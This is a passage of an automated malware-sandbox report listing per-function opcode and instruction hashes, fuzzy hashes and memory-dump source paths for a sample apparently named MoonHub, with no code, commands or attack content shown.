                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9fe1b4d2dcc6358ce42125d369dc5a3952aca8c02700987dd6cfa459d21674c
                                                                                                                                                                                • Instruction ID: e45f8fa4be74cb0534ada3203044be64c0f4736cbfc97d66dd792cff6f3e8db2
                                                                                                                                                                                • Opcode Fuzzy Hash: a9fe1b4d2dcc6358ce42125d369dc5a3952aca8c02700987dd6cfa459d21674c
                                                                                                                                                                                • Instruction Fuzzy Hash: C7112621F1CD0E4FE698F66C540A679B3C2FB8C298F0405BAE40DC3293DE78AC418385
                                                                                                                                                                                Function 00007FF848E98191 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bfc9215004af26d18241afae7fb29473a13453990b861408afc52b7527133564
                                                                                                                                                                                • Instruction ID: 7e7ae8bd4abf36a039b0859f6a95d8b1d58a0a913c0a94cb077a422c4fe93c65
                                                                                                                                                                                • Opcode Fuzzy Hash: bfc9215004af26d18241afae7fb29473a13453990b861408afc52b7527133564
                                                                                                                                                                                • Instruction Fuzzy Hash: 4021053189D6D50FE341B7B858256E53FE0EF52364F0901F6E089CB0A3EA1D480B8751
                                                                                                                                                                                Function 00007FF848EE2278 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 31b1be5cea8d5fa4e9a018c94e65e3c5d0c138f1fe82695b1fa8fecd7193930a
                                                                                                                                                                                • Instruction ID: 6a37c10a091bf5fe4c59c69e58850b805b5a666987e5ae4de66a924c325377d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 31b1be5cea8d5fa4e9a018c94e65e3c5d0c138f1fe82695b1fa8fecd7193930a
                                                                                                                                                                                • Instruction Fuzzy Hash: F311D53060C9098FFB5CEA08D8497B672D1FB95351F24413ED44EC6192DB39EC82C7A4
                                                                                                                                                                                Function 00007FF848EABB28 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfb9123a8426df0896d58a47285a8fcb61b659998a935360696d02df567bc1e0
                                                                                                                                                                                • Instruction ID: 32191b4d10188727aad0aa8a01887b2c4113157d4a4cea92ca2b62df5c7150ca
                                                                                                                                                                                • Opcode Fuzzy Hash: cfb9123a8426df0896d58a47285a8fcb61b659998a935360696d02df567bc1e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2921243091CA9A5FE7A5AB3488256B5BBE0FF41350F0401FAD409DB092DE2C68448766
                                                                                                                                                                                Function 00007FF848EABC28 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 514c62a9b027b8dc8dd5c52890c1547356c615886ecb4d70c1e6929592527130
                                                                                                                                                                                • Instruction ID: 9ccddc8600f4b515b67364c73231c448e05828411fc94798f2b4eb410f973b63
                                                                                                                                                                                • Opcode Fuzzy Hash: 514c62a9b027b8dc8dd5c52890c1547356c615886ecb4d70c1e6929592527130
                                                                                                                                                                                • Instruction Fuzzy Hash: 8911D321F0CC1A4FDAD8E62CF4946B533D1FB99360B1901BAD40DC7285EA2DDC828384
                                                                                                                                                                                Function 00007FF848EA9282 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f3ccb8d6b8dee58908318d6e52e75a1c915efc230bc088c54c89fb05a87fa7de
                                                                                                                                                                                • Instruction ID: eb9dc879c148b9cd9f19c53dd2e01b83fca0573c21d70cd32a8f4731f04ac0af
                                                                                                                                                                                • Opcode Fuzzy Hash: f3ccb8d6b8dee58908318d6e52e75a1c915efc230bc088c54c89fb05a87fa7de
                                                                                                                                                                                • Instruction Fuzzy Hash: BD21D42AC0CB990EFB66B6B858111F977E0FF49B90F4801B6D66CC30C2DF38680E4685
                                                                                                                                                                                Function 00007FF848EA8252 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fab99c73ee268ac60953eba66e4457817f7094b9e8d553da696c9a4a65830bf8
                                                                                                                                                                                • Instruction ID: d1cdaab17aa37e92970607956bb64391c729bf8ad0b73692d9dcad0cd91a8f2f
                                                                                                                                                                                • Opcode Fuzzy Hash: fab99c73ee268ac60953eba66e4457817f7094b9e8d553da696c9a4a65830bf8
                                                                                                                                                                                • Instruction Fuzzy Hash: BD21D136D0CAA94EF7A4B22848112B976E0FF99B91F4501BAD44CC34C2DF382C1F568A
                                                                                                                                                                                Function 00007FF848EA148A Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8db78aca3978ff299e33c2ff259c416744be64817ec7d310d9711723e680f3c8
                                                                                                                                                                                • Instruction ID: 941f4ccb4f18df9061b856bfc2f2078e3b5d0b2441ac9294f5fea601aae27967
                                                                                                                                                                                • Opcode Fuzzy Hash: 8db78aca3978ff299e33c2ff259c416744be64817ec7d310d9711723e680f3c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D21D126D0CA5E4EF768B66868122F976D1FF45BE0F4401B6D41FC30C2EE3B690A0685
                                                                                                                                                                                Function 00007FF848E93F65 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f24a9197c8ed827f50a42cdf334bb8b7d56453d1c3025509849983d42cb1b5ec
                                                                                                                                                                                • Instruction ID: e98906ea667ad3d495f2d6ea25db883fc202bfd5750d782bafc82d0e376f8cd4
                                                                                                                                                                                • Opcode Fuzzy Hash: f24a9197c8ed827f50a42cdf334bb8b7d56453d1c3025509849983d42cb1b5ec
                                                                                                                                                                                • Instruction Fuzzy Hash: C4110232D0C95E4EF7B4B6A848122F936D1FF4A39CF4401B6D41CC30C2EFB9291A0686
                                                                                                                                                                                Function 00007FF848EA53C2 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae97ffb153d1eeada3f91d79cba249dc41c70a4f54586e8e4306f082d99c4024
                                                                                                                                                                                • Instruction ID: a7109454d682f13be6b407a4da45db069a913c74b24b90fbba3585af841d607e
                                                                                                                                                                                • Opcode Fuzzy Hash: ae97ffb153d1eeada3f91d79cba249dc41c70a4f54586e8e4306f082d99c4024
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C21C632D0D7994EF774B26448112B976E0FF45FA2F4901BAD45EC3493DF38681A4685
                                                                                                                                                                                Function 00007FF848E9F8B5 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41f7d73aabcf5930b869abc1e20bc07ecfefdca9807fdffdf9b29641584cf4cd
                                                                                                                                                                                • Instruction ID: 5e9d119829e958991f6937bf361778c1a2cf15df6e2ff75a896c353b79fd7070
                                                                                                                                                                                • Opcode Fuzzy Hash: 41f7d73aabcf5930b869abc1e20bc07ecfefdca9807fdffdf9b29641584cf4cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6021F322D0C85E6EF7A4B2E888112F972D0FF883A9F440176D81CC34C2DF68A80A0285
                                                                                                                                                                                Function 00007FF848E9841A Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 93c248ef0776a61bffabd177d4220fdbd8c464d8a02d06f70e08e585df206d45
                                                                                                                                                                                • Instruction ID: f49bb2b19511172214d04a51454a969b26f8cfcab0f0d17701f4a752f3065538
                                                                                                                                                                                • Opcode Fuzzy Hash: 93c248ef0776a61bffabd177d4220fdbd8c464d8a02d06f70e08e585df206d45
                                                                                                                                                                                • Instruction Fuzzy Hash: 1021C232D0D9AA0EF7B4B6A448111F976E0FF45398F4801BAD45CC36E3DFB8690B5A85
                                                                                                                                                                                Function 00007FF848EA6B82 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5c57733f8be81eda90a77af892aa24087a3b9dbbc9467a13b05f8e0d7bd50907
                                                                                                                                                                                • Instruction ID: 7c6252dcd4d106b09972c02d8bb916dc693b9c112039ccf0fd4cae7f86dd3ea3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c57733f8be81eda90a77af892aa24087a3b9dbbc9467a13b05f8e0d7bd50907
                                                                                                                                                                                • Instruction Fuzzy Hash: 9821F636D0CA8E9EF7A4B6384C111F976E0FF86790F4401B6D45CC70E2EF38A9094689
                                                                                                                                                                                Function 00007FF848EA3CF2 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6036da5dd30791729061cae3945ec7fa8434bc34b5448f476d2bc23681e0eecd
                                                                                                                                                                                • Instruction ID: 2ae0c7c93a96fba0c3ff0eeb20e3c0a3d5620d9776369940f6808a83b9bd66b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 6036da5dd30791729061cae3945ec7fa8434bc34b5448f476d2bc23681e0eecd
                                                                                                                                                                                • Instruction Fuzzy Hash: AD21D131D0CA9A8FF7A5B22CC8152F9BBE1FF85790F4801BAD45CC7482DF38680A4685
                                                                                                                                                                                Function 00007FF848EA2E42 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7d40e51843d1f5666bf4dad9aad42be9194cebd99dd3311f292c9409d4352a61
                                                                                                                                                                                • Instruction ID: 8d153ddc3076e193409e1dddd246c67e1842e9da003e73797a60fea98f098462
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d40e51843d1f5666bf4dad9aad42be9194cebd99dd3311f292c9409d4352a61
                                                                                                                                                                                • Instruction Fuzzy Hash: EC210536E1CB9A4EF7B5F22848152B976E0FF45790F4841BAD45CE3487DF38280A4685
                                                                                                                                                                                Function 00007FF848EA74C9 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 057793698eb884c9ae85d137500439c167f963aeede6cc319b0d70aa188344e6
                                                                                                                                                                                • Instruction ID: c875951ec76cf8d1e81dfadbda47e69c66b1727e13bcd5589b3352f9c884dc35
                                                                                                                                                                                • Opcode Fuzzy Hash: 057793698eb884c9ae85d137500439c167f963aeede6cc319b0d70aa188344e6
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B21A122D0CA9A4EF774F6645C212F976E0FF45B90F4401B6D49CC35C3EF3A68094685
                                                                                                                                                                                Function 00007FF848EA9D18 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ac193ed47e6da0c39e12ffa5190dcfe70391d1cbeb2ea2a4460d4a463af73a26
                                                                                                                                                                                • Instruction ID: 4457af3fbe7ac82385ef3c0cad9230612a6cac20a5768b718db5e476bd8ab399
                                                                                                                                                                                • Opcode Fuzzy Hash: ac193ed47e6da0c39e12ffa5190dcfe70391d1cbeb2ea2a4460d4a463af73a26
                                                                                                                                                                                • Instruction Fuzzy Hash: 71112331E1CE490EE79AB66C104953A26C1EFE8B90F08463BE41DD3297DF349842429A
                                                                                                                                                                                Function 00007FF848E97C85 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e00edc2cc73ad4a858b538c8141b61427456060bdc9eefe2678d2c476f524ca
                                                                                                                                                                                • Instruction ID: 9106bbbe40ca4c20f0d262eef443b3940edc7e57cb156edc6aa2d45e6a269b16
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e00edc2cc73ad4a858b538c8141b61427456060bdc9eefe2678d2c476f524ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B21D63194E6895FC7429BB48C556ED7FF4EF4B250B0541E7E088C71A3CA2C594ACBA1
                                                                                                                                                                                Function 00007FF848EA9828 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e03b26cefecf5c4dbbe3d7b08ea0b86856e41d038785b85453aa99602b024afd
                                                                                                                                                                                • Instruction ID: 330b682dc88b9f97f73d17a664908fb64af1b447c137ca5b8433bb41cd729184
                                                                                                                                                                                • Opcode Fuzzy Hash: e03b26cefecf5c4dbbe3d7b08ea0b86856e41d038785b85453aa99602b024afd
                                                                                                                                                                                • Instruction Fuzzy Hash: 36218B7290CB815FE30AF72CA8A50F57BE0FF95355F0842B7D088CB1A3EA2845148399
                                                                                                                                                                                Function 00007FF848E97AD0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16ccbd445d8e7517c26563d9a53d0e6601af764e65d96679f58bc0e9968e9651
                                                                                                                                                                                • Instruction ID: 460348370a41b2cc1615f4d181bc0bfecec5cb6ee43a0fc0c86f7785f3a873b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 16ccbd445d8e7517c26563d9a53d0e6601af764e65d96679f58bc0e9968e9651
                                                                                                                                                                                • Instruction Fuzzy Hash: 4521C331E1D94A9FEB80FBA888156BA7BE1FF18694F4400FAD40ED7192EF7868058345
                                                                                                                                                                                Function 00007FF848EB9270 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4a06ce6547721fe774ec8a0b5deadcaa942af882f81778a15a9f33044f5f0748
                                                                                                                                                                                • Instruction ID: 9b50a252c5624608bc84b791b892a5281c549860b47e70f48e1f8f585d23ebbe
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a06ce6547721fe774ec8a0b5deadcaa942af882f81778a15a9f33044f5f0748
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A012F32B1DD150FA74CF52CB8499B6B7D0DBA9271B04457FD80DC3197ED2698428285
                                                                                                                                                                                Function 00007FF848EA463D Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fe391e746dfc6e1f1bb98ecbc48f1386f7695ebf09f2dacf2bb321cf4d4de83e
                                                                                                                                                                                • Instruction ID: 3123f727db7ca3934823ea42275cdb6f9754b29cd9bce0557c20b2a3802338ec
                                                                                                                                                                                • Opcode Fuzzy Hash: fe391e746dfc6e1f1bb98ecbc48f1386f7695ebf09f2dacf2bb321cf4d4de83e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4621F336C0CB9A4EF764B62898161B976E4FF86794F4501B6D81CC38D2DF38281A4285
                                                                                                                                                                                Function 00007FF848EA999B Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eed99aa9aa9725039917ce51106549101ac9fa592179d96b9504d072d8cc05de
                                                                                                                                                                                • Instruction ID: e0d57909043c0042ca1ff6f05c6de261f9788f8c43a0bb47d527c5078a5ad55f
                                                                                                                                                                                • Opcode Fuzzy Hash: eed99aa9aa9725039917ce51106549101ac9fa592179d96b9504d072d8cc05de
                                                                                                                                                                                • Instruction Fuzzy Hash: DC21012050DBC24FD30BAB7458651B43FB1EF02750B2900EFC48ACB493EA29A85AC355
                                                                                                                                                                                Function 00007FF848EA15E0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0be8b141677fb83179e3fd8f7bd3363e8a2dbbab00487ffb625749bce4ff6cf6
                                                                                                                                                                                • Instruction ID: 7c3c14d250d664053c91fb1c4f6a38eea4484a6eb95906ac6c641cf9eab213c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 0be8b141677fb83179e3fd8f7bd3363e8a2dbbab00487ffb625749bce4ff6cf6
                                                                                                                                                                                • Instruction Fuzzy Hash: CD110631E1CE091EE79AB66C504957B26C1EFE8BD0F04463BE41ED3296DF3498424289
                                                                                                                                                                                Function 00007FF848E9F2C0 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c0255854fa32f9b7e0017d19a1e5fa408c013d46f4e3fb35aa140ad45cc333b2
                                                                                                                                                                                • Instruction ID: 459ae0387cd95e1ed9292321068126174f27a10ce22cb9f87e3bf565cf479cef
                                                                                                                                                                                • Opcode Fuzzy Hash: c0255854fa32f9b7e0017d19a1e5fa408c013d46f4e3fb35aa140ad45cc333b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C112121E1CF1A0FE778612C60853BA63C1FF087A0F14517EE48F831C3EE29A8825298
                                                                                                                                                                                Function 00007FF848E9F1D8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 142fe85b6fb516b7e7a232305f734217aabb98bf041cad8bb0953dc23889d501
                                                                                                                                                                                • Instruction ID: f81b38d4b5007043af2b3983f763567490abc806e56d6d1b75c46e6ff18ef8b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 142fe85b6fb516b7e7a232305f734217aabb98bf041cad8bb0953dc23889d501
                                                                                                                                                                                • Instruction Fuzzy Hash: 5511D026D0CA5E4DF7B4B22868122FA72D4FF89BE0F440176D42FC3482DF3B290A0589
                                                                                                                                                                                Function 00007FF848EAA24D Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
